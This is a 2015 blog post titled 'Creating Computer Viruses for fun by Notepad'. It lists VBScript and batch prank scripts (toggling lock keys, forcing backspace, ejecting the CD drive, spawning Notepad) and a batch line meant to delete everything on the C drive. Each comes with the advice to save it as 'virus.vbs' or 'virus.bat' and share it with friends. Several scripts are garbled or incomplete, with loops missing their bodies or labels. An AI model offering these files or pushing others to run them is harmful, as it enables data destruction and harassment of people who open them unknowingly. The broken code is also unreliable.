March 7, 2015

Creating Computer Viruses for fun by Notepad

I am providing easy codes that will make you viruses using notepad. This code based files can harm your computer so do not try these tricks on your own computer. Copy given code to Notepad and follow the given instructions.

1. Toggle your friend's Caps Lock, Num Lock, Scroll Lock buttons :
 Set wshShell =wscript.CreateObject("WScript.Shell")  
 wscript.sleep 100  
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"  

Save this as "virus.vbs" and share it.

2. Frustrate somebody by making him/her hit Backspace again and again :

 MsgBox "Please try to go back"  
 Set wshShell =wscript.CreateObject("WScript.Shell")  
 wscript.sleep 100  
 wshshell.sendkeys "{bs}"  
Save this as "virus.vbs" and share it.

3. Ejecting your friend's CD Drive again n again :

 Set oWMP = CreateObject("WMPlayer.OCX.7")  
 Set colCDROMs = oWMP.cdromCollection  
 if colCDROMs.Count >= 1 then  
 For i = 0 to colCDROMs.Count - 1  
 For i = 0 to colCDROMs.Count - 1  
 End If  
 wscript.sleep 5000  
Save this as "virus.vbs" and share it.

4. Creating Virus That Format C Drive : (for Win XP)

 @Echo off  
 Del C:\ *.* |y  
Save this as "virus.bat" and share it.

5. Open Notepad continually in your friend's computer:

 @ECHO off  
 START %SystemRoot%\system32\notepad.exe  
 GOTO top  
Save this as "virus.bat" and share it.


We shall not be liable for the improper or incomplete transmission of the information contained in this communication nor for any delay in its response or damage to your system. We do not guarantee that the integrity or security of this communication has been maintained or that this communication is free of viruses, interceptions or interferences. Anyone communicating with us by email accepts the risks involved and their consequences. We accept no liability for any damage caused by any virus transmitted by this site.